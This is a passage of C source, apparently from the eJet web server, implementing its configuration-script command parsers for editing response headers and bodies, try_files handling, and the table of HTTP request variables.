msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* delResHeader x-forward-ip;
delResHeader x-Real-IP; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "delResHeader", 12) != 0) return pexpend;
pbgn += 12;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting header name */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 0);
msg->DelResHdr(msg, name, strlen(name));
return pexpend;
}
char * script_add_res_body_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
HeaderUnit * punit = NULL;
int64 val64 = 0;
int64 addlen = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* addResBody "added body content";
insert the content to the head of response body */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "addResBody", 10) != 0) return pexpend;
pbgn += 10;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting body value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct < pbgn) return pexpend;
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++; poct--;
}
if (poct >= pbgn) {
addlen = poct - pbgn + 1;
addlen = chunk_prepend_strip_buffer(msg->res_body_chunk, pbgn, addlen, "\r\n\t\b\f\v'\"\\/", 10, 0);
if (addlen < 0) addlen = 0;
if (msg->res_body_flag == BC_CONTENT_LENGTH) {
punit = http_header_get(msg, 1, "Content-Length", 14);
if (punit) {
val64 = strtoll(punit->value, NULL, 10);
val64 += addlen;
http_header_del(msg, 1, "Content-Length", 14);
} else {
val64 = addlen;
}
http_header_append_int64(msg, 1, "Content-Length", 14, val64);
} else if (msg->res_body_flag == BC_TE) {
if (http_header_get(msg, 1, "Transfer-Encoding", -1) == NULL) {
http_header_append(msg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
}
}
return pexpend;
}
char * script_append_res_body_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
HeaderUnit * punit = NULL;
int64 val64 = 0;
int64 addlen = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* appendResBody "appended body content";
insert the content to the tail of response body */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "appendResBody", 13) != 0) return pexpend;
pbgn += 13;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting body value */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
poct = rskipOver(poct-1, poct-pbgn, " \t\r\n\f\v", 6);
if (poct < pbgn) return pexpend;
if ((*pbgn == '"' || *pbgn == '\'') && *poct == *pbgn) {
pbgn++; poct--;
}
if (poct >= pbgn) {
addlen = poct - pbgn + 1;
addlen = chunk_append_strip_buffer(msg->res_body_chunk, pbgn, addlen, "\r\n\t\b\f\v'\"\\/", 10);
if (addlen < 0) addlen = 0;
if (msg->res_body_flag == BC_CONTENT_LENGTH) {
punit = http_header_get(msg, 1, "Content-Length", 14);
if (punit) {
val64 = strtoll(punit->value, NULL, 10);
val64 += addlen;
http_header_del(msg, 1, "Content-Length", 14);
} else {
val64 = addlen;
}
http_header_append_int64(msg, 1, "Content-Length", 14, val64);
} else if (msg->res_body_flag == BC_TE) {
if (http_header_get(msg, 1, "Transfer-Encoding", -1) == NULL) {
http_header_append(msg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
}
if (poct) kfree(poct);
}
return pexpend;
}
char * script_add_file_to_res_body_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char fpath[2048];
char value[1024];
HeaderUnit * punit = NULL;
int64 fsize = 0;
int64 val64 = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* addFile2ResBody /abc/def.js;
addFile2ResBody $file_path */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "addFile2ResBody", 15) != 0) return pexpend;
pbgn += 15;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting file path to be appended to body */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
poct = str_trim(value);
if (!poct || strlen(poct) <= 0)
return pexpend;
if (poct[0] == '/') {
sprintf(fpath, "%s", msg->GetRootPath(msg));
sprintf(fpath + strlen(fpath), "%s", poct);
} else {
fpath[0] = '\0';
msg->GetRealPath(msg, fpath, sizeof(fpath)-1);
sprintf(fpath + strlen(fpath), "%s", poct);
}
if (msg->res_body_flag == BC_TE) val64 = 2 * 1024 * 1024;
else val64 = 0;
fsize = chunk_prepend_file(msg->res_body_chunk, fpath, val64);
if (fsize > 0) {
if (msg->res_body_flag == BC_CONTENT_LENGTH) {
punit = http_header_get(msg, 1, "Content-Length", 14);
if (punit) {
val64 = strtoll(punit->value, NULL, 10);
val64 += fsize;
http_header_del(msg, 1, "Content-Length", 14);
} else {
val64 = fsize;
}
http_header_append_int64(msg, 1, "Content-Length", 14, val64);
} else if (msg->res_body_flag == BC_TE) {
if (http_header_get(msg, 1, "Transfer-Encoding", -1) == NULL) {
http_header_append(msg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
}
}
return pexpend;
}
char * script_append_file_to_res_body_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char fpath[2048];
char value[1024];
HeaderUnit * punit = NULL;
int64 fsize = 0;
int64 val64 = 0;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* appendFile2ResBody /abc/def.js;
appendFile2ResBody $file_path */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "appendFile2ResBody", 18) != 0) return pexpend;
pbgn += 18;
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting file path to be appended to body */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
get_var_value(hsc, pbgn, poct-pbgn, value, sizeof(value)-1, 1);
poct = str_trim(value);
if (!poct || strlen(poct) <= 0)
return pexpend;
if (poct[0] == '/') {
sprintf(fpath, "%s", msg->GetRootPath(msg));
sprintf(fpath + strlen(fpath), "%s", poct);
} else {
fpath[0] = '\0';
msg->GetRealPath(msg, fpath, sizeof(fpath)-1);
sprintf(fpath + strlen(fpath), "%s", poct);
}
if (msg->res_body_flag == BC_TE) val64 = 2 * 1024 * 1024;
else val64 = 0;
fsize = chunk_append_file(msg->res_body_chunk, fpath, val64);
if (fsize > 0) {
if (msg->res_body_flag == BC_CONTENT_LENGTH) {
punit = http_header_get(msg, 1, "Content-Length", 14);
if (punit) {
val64 = strtoll(punit->value, NULL, 10);
val64 += fsize;
http_header_del(msg, 1, "Content-Length", 14);
} else {
val64 = fsize;
}
http_header_append_int64(msg, 1, "Content-Length", 14, val64);
} else if (msg->res_body_flag == BC_TE) {
if (http_header_get(msg, 1, "Transfer-Encoding", -1) == NULL) {
http_header_append(msg, 1, "Transfer-Encoding", 17, "chunked", 7);
}
}
}
return pexpend;
}
char * script_try_files_parse (void * vhsc, char * p, int len)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
HTTPMsg * msg = NULL;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
char * pexpend = NULL;
char name[2048];
int namelen = 0;
char path[4092];
uint8 lastitem = 0;
int status = 0;
HTTPHost * phost = NULL;
HTTPLoc * ploc = NULL;
if (!hsc) return p;
msg = (HTTPMsg *)hsc->msg;
if (!msg) return p;
if (!p) return NULL;
if (len < 0) len = strlen(p);
if (len <= 2) return p;
/* try_files file1 file2 ... uri;;
or try_files file1 file2 ... =code; */
pbgn = p;
pend = p + len;
pbgn = skipOver(pbgn, len, " \t\r\n\f\v", 6);
if (pbgn >= pend) return pbgn;
pexpend = skipQuoteTo(pbgn, pend-pbgn, ";", 1);
if (pexpend - pbgn < 12) return pexpend;
if (strncasecmp(pbgn, "try_files", 9) != 0) return pexpend;
pbgn += 9;
while (pbgn < pend) {
pbgn = skipOver(pbgn, pexpend-pbgn, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) return pexpend;
/* extracting file from list to check if existing or not */
poct = goto_symbol_end(pbgn, pexpend - pbgn);
name[0] = '\0';
get_var_value(hsc, pbgn, poct-pbgn, name, sizeof(name)-1, 1);
namelen = strlen(name);
pbgn = skipOver(poct, pexpend-poct, " \t\r\n\f\v", 6);
if (pbgn >= pexpend) {
lastitem = 1;
}
if (namelen <= 0) continue;
if (name[0] == '=') {
status = str_to_int(name+1, namelen-1, 10, NULL);
msg->SetStatus(msg, status, NULL);
msg->Reply(msg);
hsc->exitflag = 1;
hsc->replied = 1;
break;
} else if (name[0] == '@') {
/* consequently, internally redirect to another location within same host */
phost = (HTTPHost *)msg->phost;
if (!phost) continue;
ploc = ht_get(phost->exact_loc_table, name);
if (ploc) {
msg->ploc = ploc;
msg->matchnum = 1;
msg->matchstr[0].p = msg->docuri->path;
msg->matchstr[0].len = msg->docuri->pathlen;
}
} else {
if (lastitem) {
msg->SetDocURL(msg, name, namelen, 0, 0);
break;
}
if (msg->GetLocFile(msg, name, namelen, NULL, 0, path, sizeof(path)-1) > 0) {
msg->SetDocURL(msg, path, strlen(path), 0, 0);
break;
}
}
}
return pexpend;
}
int http_script_parse_exec (void * vhsc, char * sc, int sclen)
{
HTTPScript * hsc = (HTTPScript *)vhsc;
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
int len = 0;
ScriptParser * parser = NULL;
if (!hsc) return -1;
if (!sc) {
sc = hsc->script;
sclen = hsc->scriptlen;
}
if (!sc) return -2;
if (sclen < 0) sclen = strlen(sc);
if (sclen <= 0) return -3;
pbgn = sc;
pend = sc + sclen;
while (pbgn < pend && !hsc->exitflag && !hsc->replied) {
pbgn = skipOver(pbgn, pend-pbgn, "; \t\r\n\f\v", 7);
if (pbgn >= pend) break;
/* skip the Comment lines (prefix #) or blocks */
if (*pbgn == '#') {
pbgn = skipTo(pbgn, pend-pbgn, "\r\n", 2);
continue;
} else if (pbgn[0] == '/' && pbgn[1] == '*') {
pbgn += 2;
//find the comment end * and /
for (poct = pbgn; poct < pend; ) {
poct = skipTo(poct, pend-poct, "*", 1);
if (poct < pend - 1 && poct[1] != '/') {
poct++;
continue;
} else break;
}
if (poct >= pend - 1) {
pbgn = poct;
} else if (poct[0] == '*' && poct[1] == '/') {
pbgn = poct + 2;
}
continue;
}
if (*pbgn == '$') { //var $tmp = 1;
poct = script_assignment_parse(hsc, pbgn, pend-poct);
if (!poct) return -100;
pbgn = poct;
continue;
}
for (poct = pbgn, len = 0; poct < pend; poct++, len++) {
if (len == 0 && !is_var_char(*poct)) break;
if (len > 0 && !is_var_char(*poct) && !isdigit(*poct)) break;
}
len = poct - pbgn;
parser = script_parser_get(pbgn, len);
if (parser) {
poct = (*parser)(hsc, pbgn, pend-pbgn);
if (!poct) return -101;
pbgn = poct;
continue;
}
/* unknown token, find the end flag of the expression */
pbgn = skipTo(poct, pend-poct, ";", 1);
continue;
}
return 0;
}
int http_script_segment_exec (void * vmsg, char * psc, int sclen,
char ** pval, int * vallen, char * vname, int vtype)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPScript hsc = {0};
char * pbgn = NULL;
char * pend = NULL;
char * poct = NULL;
int ret = 0;
if (pval) *pval = NULL;
if (vallen) *vallen = 0;
if (!msg) return -1;
pbgn = psc;
pend = psc + sclen;
poct = sun_find_string(pbgn, pend-pbgn, "<script>", 8, NULL);
if (poct) {
pbgn = poct + 8;
poct = sun_find_string(pbgn, pend-pbgn, "</script>", 9, NULL);
if (poct) pend = poct;
}
http_script_init(&hsc, msg, pbgn, pend-pbgn, 0, vname, vtype);
ret = http_script_parse_exec(&hsc, pbgn, pend-pbgn);
if (ret >= 0 && pval) {
*pval = hsc.retval;
hsc.retval = NULL;
}
if (vallen) *vallen = hsc.retvallen;
http_script_free(&hsc);
return 0;
}
int http_script_exec (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPScript hsc;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
int i, num;
ckstr_t * psc = NULL;
uint8 reloc = 0;
uint8 replied = 0;
if (!msg) return -1;
memset(&hsc, 0, sizeof(hsc));
hl = (HTTPListen *)msg->hl;
if (hl) {
num = arr_num(hl->script_list);
for (i = 0; i < num; i++) {
psc = arr_value(hl->script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 1, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
reloc = hsc.reloc;
replied = hsc.replied;
http_script_free(&hsc);
if (replied) return 0;
if (reloc) {
http_loc_instance(msg);
return 0;
}
}
}
host = (HTTPHost *)msg->phost;
if (host) {
num = arr_num(host->script_list);
for (i = 0; i < num; i++) {
psc = arr_value(host->script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 2, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
reloc = hsc.reloc;
replied = hsc.replied;
http_script_free(&hsc);
if (replied) return 0;
if (reloc) {
http_loc_instance(msg);
return 0;
}
}
}
ploc = (HTTPLoc *)msg->ploc;
if (ploc) {
num = arr_num(ploc->script_list);
for (i = 0; i < num; i++) {
psc = arr_value(ploc->script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 3, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
reloc = hsc.reloc;
replied = hsc.replied;
http_script_free(&hsc);
if (replied) return 0;
if (reloc) {
http_loc_instance(msg);
return 0;
}
}
}
return 1;
}
int http_reply_script_exec (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPScript hsc;
HTTPListen * hl = NULL;
HTTPHost * host = NULL;
HTTPLoc * ploc = NULL;
int i, num;
ckstr_t * psc = NULL;
if (!msg) return -1;
memset(&hsc, 0, sizeof(hsc));
hl = (HTTPListen *)msg->hl;
if (hl) {
num = arr_num(hl->reply_script_list);
for (i = 0; i < num; i++) {
psc = arr_value(hl->reply_script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 1, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
http_script_free(&hsc);
}
}
host = (HTTPHost *)msg->phost;
if (host) {
num = arr_num(host->reply_script_list);
for (i = 0; i < num; i++) {
psc = arr_value(host->reply_script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 2, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
http_script_free(&hsc);
}
}
ploc = (HTTPLoc *)msg->ploc;
if (ploc) {
num = arr_num(ploc->reply_script_list);
for (i = 0; i < num; i++) {
psc = arr_value(ploc->reply_script_list, i);
if (!psc || !psc->p || psc->len <= 0)
continue;
http_script_init(&hsc, msg, psc->p, psc->len, 3, NULL, 0);
http_script_parse_exec(&hsc, psc->p, psc->len);
http_script_free(&hsc);
}
}
return 1;
}
void script_parser_init ()
{
int i, num;
ckstr_t key;
static scmd_t scmd_tab [] = {
{ "if", 2, script_if_parse },
{ "set", 3, script_set_parse },
{ "reply", 5, script_reply_parse },
{ "return", 6, script_return_parse },
{ "rewrite", 7, script_rewrite_parse },
{ "addReqHeader", 12, script_add_req_header_parse },
{ "addResHeader", 12, script_add_res_header_parse },
{ "delReqHeader", 12, script_del_req_header_parse },
{ "delResHeader", 12, script_del_res_header_parse },
{ "addResBody", 10, script_add_res_body_parse },
{ "appendResBody", 13, script_append_res_body_parse },
{ "addFile2ResBody", 15, script_add_file_to_res_body_parse },
{ "appendFile2ResBody", 18, script_append_file_to_res_body_parse },
{ "try_files", 9, script_try_files_parse }
};
if (script_parser_table) return;
script_parser_table = ht_only_new(200, ckstr_cmp);
if (!script_parser_table) return;
ht_set_hash_func(script_parser_table, ckstr_string_hash);
num = sizeof(scmd_tab) / sizeof(scmd_tab[0]);
for (i = 0; i < num; i++) {
key.p = scmd_tab[i].cmd;
key.len = scmd_tab[i].len;
ht_set(script_parser_table, &key, &scmd_tab[i]);
}
}
void script_parser_clean ()
{
if (!script_parser_table) return;
ht_free(script_parser_table);
script_parser_table = NULL;
}
void * script_parser_get (char * cmd, int len)
{
ckstr_t key = ckstr_init(cmd, len);
scmd_t * scmd;
scmd = ht_get(script_parser_table, &key);
if (scmd) return scmd->parser;
return NULL;
}
<|start_filename|>src/http_variable.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include <stddef.h>
#include "http_mgmt.h"
#include "http_msg.h"
#include "http_header.h"
#include "http_request.h"
#include "http_listen.h"
#include "http_script.h"
#include "http_variable.h"
int http_var_cmp_name (void * a, void * b)
{
http_var_t * var = (http_var_t *)a;
char * vname = (char *)b;
return str_casecmp(var->varname, vname);
}
void http_var_name (http_var_t * var, char * vname)
{
int len = 0;
if (!var || !vname) return;
len = strlen(vname);
if (len <= 0) return;
str_secpy(var->varname, sizeof(var->varname)-1, vname, len);
}
int http_var_init (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
http_var_t * var = NULL;
int i, ind = 0;
if (!mgmt) return -1;
mgmt->varsize = 48;
mgmt->variable = var = kzalloc(mgmt->varsize * sizeof(http_var_t));
//0-char 1-short 2-int 3-char[]
http_var_name(&var[ind], "remote_addr");
http_var_set6(&var[ind], HTTPMsg, srcip, dstip, 4, 0);
ind++;
http_var_name(&var[ind], "remote_port");
http_var_set6(&var[ind], HTTPMsg, srcport, dstport, 2, 0);
ind++;
http_var_name(&var[ind], "server_addr");
http_var_set(&var[ind], HTTPMsg, dstip, 4, 0, 0);
ind++;
http_var_name(&var[ind], "server_port");
http_var_set(&var[ind], HTTPMsg, req_port, 2, 0, 0);
ind++;
http_var_name(&var[ind], "request_method");
http_var_set(&var[ind], HTTPMsg, req_meth, 4, 0, 0);
ind++;
http_var_name(&var[ind], "scheme");
http_var_set2(&var[ind], HTTPMsg, req_scheme, req_schemelen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "host_name");
http_var_set2(&var[ind], HTTPMsg, req_host, req_hostlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "request_path");
http_var_set2(&var[ind], HTTPMsg, req_path, req_pathlen, 5, 0, 0);
//http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, path, pathlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "query_string");
http_var_set2(&var[ind], HTTPMsg, req_query, req_querylen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "req_path_only");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, dir, dirlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "req_file_only");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, file, filelen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "req_file_base");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, file_base, file_baselen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "req_file_ext");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, file_ext, file_extlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "real_file");
http_var_set3(&var[ind], 8, 0);
ind++;
http_var_name(&var[ind], "real_path");
http_var_set3(&var[ind], 8, 0);
ind++;
http_var_name(&var[ind], "bytes_recv");
http_var_set6(&var[ind], HTTPMsg, req_stream_recv, res_stream_recv, 3, 0);
ind++;
http_var_name(&var[ind], "bytes_sent");
http_var_set6(&var[ind], HTTPMsg, res_stream_sent, req_stream_sent, 3, 0);
ind++;
http_var_name(&var[ind], "status");
http_var_set(&var[ind], HTTPMsg, res_status, 2, 0, 0);
ind++;
http_var_name(&var[ind], "document_root");
http_var_set(&var[ind], HTTPLoc, root, 4, 0, 2);
ind++;
http_var_name(&var[ind], "fastcgi_script_name");
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, path, pathlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "content_type");
http_var_set2(&var[ind], HTTPMsg, req_content_type, req_contype_len, 5, 0, 0);
ind++;
http_var_name(&var[ind], "content_length");
http_var_set(&var[ind], HTTPMsg, req_body_length, 3, 0, 0);
ind++;
http_var_name(&var[ind], "absuri");
http_var_set4(&var[ind], HTTPMsg, absuri, HTTPUri, uri, 6, 0, 0);
ind++;
http_var_name(&var[ind], "uri");
http_var_set5(&var[ind], HTTPMsg, uri, HTTPUri, path, pathlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "request_uri");
http_var_set4(&var[ind], HTTPMsg, uri, HTTPUri, uri, 6, 0, 0);
ind++;
http_var_name(&var[ind], "document_uri");
//http_var_set4(&var[ind], HTTPMsg, docuri, HTTPUri, uri, 6, 0, 0);
http_var_set5(&var[ind], HTTPMsg, docuri, HTTPUri, path, pathlen, 5, 0, 0);
ind++;
http_var_name(&var[ind], "request");
http_var_set2(&var[ind], HTTPMsg, req_line, req_line_len, 5, 0, 0);
ind++;
http_var_name(&var[ind], "http_user_agent");
http_var_set2(&var[ind], HTTPMsg, req_useragent, req_useragent_len, 5, 0, 0);
ind++;
http_var_name(&var[ind], "http_cookie");
http_var_set2(&var[ind], HTTPMsg, req_cookie, req_cookie_len, 5, 0, 0);
ind++;
http_var_name(&var[ind], "server_protocol");
http_var_set(&var[ind], HTTPMgmt, httpver1, 4, 0, 1);
ind++;
http_var_name(&var[ind], "ejet_version");
http_var_global(&var[ind], g_http_version, 4, 0, 3);
ind++;
http_var_name(&var[ind], "request_header");
var[ind].valtype = 7; //array
var[ind].arraytype = 1; //request header
ind++;
http_var_name(&var[ind], "cookie");
var[ind].valtype = 7; //array
var[ind].arraytype = 2; //cookie
ind++;
http_var_name(&var[ind], "query");
var[ind].valtype = 7; //array
var[ind].arraytype = 3; //query
ind++;
http_var_name(&var[ind], "response_header");
var[ind].valtype = 7; //array
var[ind].arraytype = 4; //response header
ind++;
http_var_name(&var[ind], "datetime");
var[ind].valtype = 7; //array
var[ind].arraytype = 5; //datetime
ind++;
http_var_name(&var[ind], "date");
var[ind].valtype = 7; //array
var[ind].arraytype = 6; //date
ind++;
http_var_name(&var[ind], "time");
var[ind].valtype = 7; //array
var[ind].arraytype = 7; //time
ind++;
mgmt->varnum = ind;
//mgmt->var_table = ht_only_new(mgmt->varnum * 3, http_var_cmp_name);
mgmt->var_table = ht_only_new(149, http_var_cmp_name);
for (i = 0; i < ind; i++) {
ht_set(mgmt->var_table, var[i].varname, &var[i]);
}
tolog(1, "eJet - %d HTTP Variables init successfully.\n", ind);
return 0;
}
int http_var_free (void * vmgmt)
{
HTTPMgmt * mgmt = (HTTPMgmt *)vmgmt;
if (!mgmt) return -1;
if (mgmt->var_table) {
ht_free(mgmt->var_table);
mgmt->var_table = NULL;
}
kfree(mgmt->variable);
tolog(1, "eJet - HTTP Variables freed.\n");
return 0;
}
int http_var_value (void * vmsg, char * vname, char * buf, int len)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMgmt * mgmt = NULL;
HTTPLoc * ploc = NULL;
http_var_t * var = NULL;
char sbuf[128];
char varmain[128];
char * plist[4] = {NULL};
int plen[4] = {0};
int ret = 0;
void * obj = NULL;
void * subobj = NULL;
void * objlen = NULL;
char * pval = NULL;
frame_p frm = NULL;
int flen = 0;
if (!msg) return -1;
if (!vname || strlen(vname) <= 0) return -2;
mgmt = (HTTPMgmt *)msg->httpmgmt;
if (!mgmt) return -3;
/* query [ fid ] */
ret = string_tokenize(vname, -1, "[] \t\r\n", 6, (void **)plist, plen, 4);
if (ret < 0) return -4;
str_secpy(varmain, sizeof(varmain)-1, plist[0], plen[0]);
var = ht_get(mgmt->var_table, varmain);
if (!var) return -100;
/* if it's an array variable. eg. request_header[content-type] */
if (var->valtype == 7) {
switch (var->arraytype) {
case 1: //request header
return http_var_header_value(msg, 0, plist[1], plen[1], buf, len);
case 2: //cookie
return http_var_cookie_value(msg, plist[1], plen[1], buf, len);
case 3: //query
return http_var_query_value(msg, plist[1], plen[1], buf, len);
case 4: //response header
return http_var_header_value(msg, 1, plist[1], plen[1], buf, len);
case 5: //datetime, datatime[createtime], datetime[stamp]
case 6: //date, date[createtime], date[stamp]
case 7: //time, time[createtime], time[stamp]
return http_var_datetime_value(msg, plist[1], plen[1], buf, len, var->arraytype);
}
return -110;
}
ploc = (HTTPLoc *)msg->ploc;
if (!ploc && var->structtype == 2) return -4;
switch (var->structtype) {
case 0: //HTTPMsg
obj = (uint8 *)msg + var->fieldpos;
if (var->substruct) {
subobj = * (void **)obj;
obj = (uint8 *)subobj + var->subfldpos;
objlen = (uint8 *)subobj + var->subfldlenpos;
} else if (var->condcheck) {
if (msg->msgtype == 0) {
obj = (uint8 *)msg + var->subfldpos;
}
} else {
if (var->haslen)
objlen = (uint8 *)msg + var->fldlenpos;
}
break;
case 1: //HTTPMgmt
obj = (uint8 *)mgmt + var->fieldpos;
if (var->substruct) {
subobj = * (void **)obj;
obj = (uint8 *)subobj + var->subfldpos;
objlen = (uint8 *)subobj + var->subfldlenpos;
} else {
if (var->haslen)
objlen = (uint8 *)mgmt + var->fldlenpos;
}
break;
case 2: //HTTPLoc
obj = (uint8 *)ploc + var->fieldpos;
if (var->substruct) {
subobj = * (void **)obj;
obj = (uint8 *)subobj + var->subfldpos;
objlen = (uint8 *)subobj + var->subfldlenpos;
} else {
if (var->haslen)
objlen = (uint8 *)ploc + var->fldlenpos;
}
break;
case 3: //global variable
obj = var->field;
break;
}
if (obj) {
switch (var->valtype) {
case 0: //char
if (var->unsign) {
ret = sprintf(sbuf, "%d", *(uint8 *) obj );
} else {
ret = sprintf(sbuf, "%d", *(char *) obj );
}
if (buf) {
str_secpy(buf, len, sbuf, ret);
return strlen(buf);
}
return ret;
case 1: //short
if (var->unsign) {
ret = sprintf(sbuf, "%d", *(uint16 *) obj );
} else {
ret = sprintf(sbuf, "%d", *(int16 *) obj );
}
if (buf) {
str_secpy(buf, len, sbuf, ret);
return strlen(buf);
}
return ret;
case 2: //int
if (var->unsign) {
ret = sprintf(sbuf, "%u", *(uint32 *) obj );
} else {
ret = sprintf(sbuf, "%d", *(int *) obj );
}
if (buf) {
str_secpy(buf, len, sbuf, ret);
return strlen(buf);
}
return ret;
case 3: //int64
if (var->unsign) {
#if defined(_WIN32) || defined(_WIN64)
ret = sprintf(sbuf, "%I64u", *(uint64 *) obj );
#else
ret = sprintf(sbuf, "%llu", *(uint64 *) obj );
#endif
} else {
#if defined(_WIN32) || defined(_WIN64)
ret = sprintf(sbuf, "%I64d", *(int64 *) obj );
#else
ret = sprintf(sbuf, "%lld", *(int64 *) obj );
#endif
}
if (buf) {
str_secpy(buf, len, sbuf, ret);
return strlen(buf);
}
return ret;
case 4: //char []
pval = (char *) obj;
if (var->haslen)
flen = *(int *) objlen;
else
flen = strlen((char *)pval);
if (buf) {
str_secpy(buf, len, (char *)pval, flen);
return strlen(buf);
}
return flen;
case 5: //char *
pval = *(char **) obj;
if (var->haslen)
flen = *(int *) objlen;
else
flen = strlen((char *)pval);
if (buf) {
str_secpy(buf, len, (char *)pval, flen);
return strlen(buf);
}
return flen;
case 6: //frame_p
frm = *(frame_p *) obj;
if (buf) {
